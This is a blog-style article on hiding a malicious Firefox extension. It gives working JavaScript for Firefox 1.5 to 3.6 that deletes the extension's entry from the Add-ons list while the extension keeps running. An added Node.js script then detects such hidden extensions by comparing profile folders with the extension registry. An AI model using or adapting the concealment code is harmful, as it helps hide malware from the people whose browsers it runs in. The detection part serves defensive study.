I think this is a fun idea to play with; since it will surely go mainstream at some point, we might as well talk about it here.
In the coming period I will be writing a couple of articles about Mozilla malware: how to write it and how to detect it. In this first article I would like to show you how to hide installed malware in Firefox. Yes, that can be done quite easily. Contrary to what many people believe, most malware (or spyware, for that matter) is unknowingly installed by the user himself. It has nothing to do with a browser vulnerability. In fact, I have never seen any malware that relied solely on a vulnerability. The reason is obvious: vulnerabilities are hard to find and therefore exotic, their lifetime is limited, and they are usually detected quickly and patched. If a PC is infected, there is a high chance that you did it yourself. Given the computer illiteracy of internet surfers, that is why surfers are being hacked in the first place. Stop whining, because it is the truth. So basically you can say that malware writing has nothing to do with hacking. It is just a matter of convincing (or tricking) a surfer into installing software that the surfer does not know about. Really simple.
Now, Firefox allows rich interaction with its extensions; in my opinion, too much. I could better say that it allows full interaction with the browser and with the computer it runs on: extension code runs with chrome privileges and can use the same XPCOM components the browser itself uses, including file and process access, so there is no sandbox between an extension and the machine. While some may find that an excellent idea, I think otherwise. What will happen if Firefox becomes an even more popular browser? Of course attackers will focus more on Firefox. Personally, I have always thought that a browser would make an excellent place to plug in malware. Since the web has become the next desktop, it is easy to imagine where this is going. Moreover, I think there is no better way of defeating AV software than browser malware, because who scans the Firefox extension folder?
So the first thing we can do is hide the malware from the surfer. The example below removes the malicious extension from the Firefox add-on list, so that enumerating installed add-ons through the Extension Manager no longer shows it:
// Remove an extension, looked up by its display name, from the Extension
// Manager's RDF datasource so the Add-ons dialog no longer enumerates it.
function stealth(ext) {
  var rdf = Components.classes["@mozilla.org/rdf/rdf-service;1"]
      .getService(Components.interfaces.nsIRDFService);
  var container = Components.classes["@mozilla.org/rdf/container;1"]
      .createInstance(Components.interfaces.nsIRDFContainer);
  // The Extension Manager keeps every installed item in this datasource.
  var ds = Components.classes["@mozilla.org/extensions/manager;1"]
      .getService(Components.interfaces.nsIExtensionManager).datasource;
  var nameArc = rdf.GetResource("http://www.mozilla.org/2004/em-rdf#name");
  // urn:mozilla:item:root is the RDF container that holds all installed items.
  container.Init(ds, rdf.GetResource("urn:mozilla:item:root"));
  var items = container.GetElements();
  while (items.hasMoreElements()) {
    var item = items.getNext().QueryInterface(Components.interfaces.nsIRDFResource);
    var nameNode = ds.GetTarget(item, nameArc, true);
    if (nameNode === null) continue; // item without an em:name property
    var name = nameNode.QueryInterface(Components.interfaces.nsIRDFLiteral).Value;
    if (name == ext) {
      // Only the membership arc is removed; the item's own properties stay.
      container.RemoveElement(item, true);
    }
  }
}
stealth("Extension Name");

That wasn't hard, was it?
When this function is called from a source file of an XPI installation package, the extension no longer shows up in the add-on list, and so we have successfully hidden our malware. Note what the function does and does not do: it removes the extension's entry from the root container that the Add-ons dialog enumerates, but the extension's files stay in the profile's extensions folder and the extension keeps loading. That is also the detection hook: compare the directories in the profile's extensions folder (one per extension ID) with what the add-on list reports. The code relies on the RDF-backed nsIExtensionManager of Firefox 1.5 through 3.6; Firefox 4 replaced it with the Add-on Manager (AddonManager.jsm), where this datasource no longer exists. Next time I will talk about how to write a small extension that can be classified as browser malware, and how to stay safe or detect it.
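The detection counterpart of the trick above, as an added example that is not part of the original article: because stealth() only removes the item's membership arc from urn:mozilla:item:root, the extension's directory in the profile's extensions folder and its em:name/em:version triples in the datasource survive. This Node.js script parses a constructed extensions.rdf (an approximation of the RDF/XML file the Firefox 1.5 to 3.x Extension Manager persisted, not a real file) and compares the root container against a constructed list of directory names from the extensions folder, which are named after extension IDs. The same comparison can be made live against the in-memory datasource with the nsIRDFContainer calls from the article; this version works on the serialized file so it runs outside the browser. The IDs, names and the parseRootItems/parseDescriptions/findHiddenExtensions functions are all assumptions of this example.

```javascript
// Added example: compare what the Extension Manager's root container lists
// against what is installed on disk. Sample data below is constructed and the
// RDF/XML layout is an approximation of extensions.rdf, not a real profile.
const ROOT = 'urn:mozilla:item:root';
const ITEM_PREFIX = 'urn:mozilla:item:';

// IDs referenced from the root RDF:Seq, i.e. what the Add-ons dialog enumerates.
function parseRootItems(rdf) {
  const ids = new Set();
  const seqRe = new RegExp(
    '<RDF:Seq[^>]*RDF:about="' + ROOT + '"[^>]*>([\\s\\S]*?)</RDF:Seq>');
  const m = seqRe.exec(rdf);
  if (!m) return ids;
  const liRe = /<RDF:li[^>]*RDF:resource="([^"]+)"/g;
  let li;
  while ((li = liRe.exec(m[1])) !== null) {
    ids.add(li[1].slice(ITEM_PREFIX.length));
  }
  return ids;
}

// Map id -> {name, version} for every RDF:Description of an item, whether or
// not the root container still references it.
function parseDescriptions(rdf) {
  const items = new Map();
  const descRe = /<RDF:Description\b([^>]*)>/g;
  let d;
  while ((d = descRe.exec(rdf)) !== null) {
    const attrs = {};
    const attrRe = /([\w:]+)="([^"]*)"/g;
    let a;
    while ((a = attrRe.exec(d[1])) !== null) attrs[a[1]] = a[2];
    const about = attrs['RDF:about'] || '';
    if (!about.startsWith(ITEM_PREFIX) || about === ROOT) continue;
    items.set(about.slice(ITEM_PREFIX.length), {
      name: attrs['em:name'] || '(unnamed)',
      version: attrs['em:version'] || '',
    });
  }
  return items;
}

// Flag every on-disk extension the root container no longer lists. An item
// that is still described (em:name present) but unlisted is exactly the trace
// stealth() leaves behind; an undescribed one was never registered at all.
function findHiddenExtensions(rdf, onDiskIds) {
  const listed = parseRootItems(rdf);
  const described = parseDescriptions(rdf);
  const hidden = [];
  for (const id of onDiskIds) {
    if (listed.has(id)) continue;
    const info = described.get(id);
    hidden.push({
      id,
      name: info ? info.name : '(not in datasource)',
      reason: info ? 'described but removed from root container'
                   : 'on disk but unknown to extension manager',
    });
  }
  return hidden;
}

// Constructed sample: "stealthy" has been removed from the root Seq the way
// stealth() does it, but its Description is still there.
const SAMPLE_EXTENSIONS_RDF = `<?xml version="1.0"?>
<RDF:RDF xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <RDF:Seq RDF:about="urn:mozilla:item:root">
    <RDF:li RDF:resource="urn:mozilla:item:toolbar@example.test"/>
  </RDF:Seq>
  <RDF:Description RDF:about="urn:mozilla:item:toolbar@example.test"
                   em:name="Example Toolbar" em:version="1.0"/>
  <RDF:Description RDF:about="urn:mozilla:item:stealthy@example.test"
                   em:name="Stealthy" em:version="0.1"/>
</RDF:RDF>`;

// Constructed directory listing of <profile>/extensions/ (one dir per ID).
const SAMPLE_ON_DISK = [
  'toolbar@example.test', 'stealthy@example.test', 'dropped@example.test',
];

for (const f of findHiddenExtensions(SAMPLE_EXTENSIONS_RDF, SAMPLE_ON_DISK)) {
  console.log(`${f.id} (${f.name}): ${f.reason}`);
}
```

On a real profile, replace SAMPLE_ON_DISK with the directory names under the profile's extensions folder and SAMPLE_EXTENSIONS_RDF with the contents of its extensions.rdf; anything reported as "described but removed from root container" is an item the dialog no longer shows but the datasource still knows about.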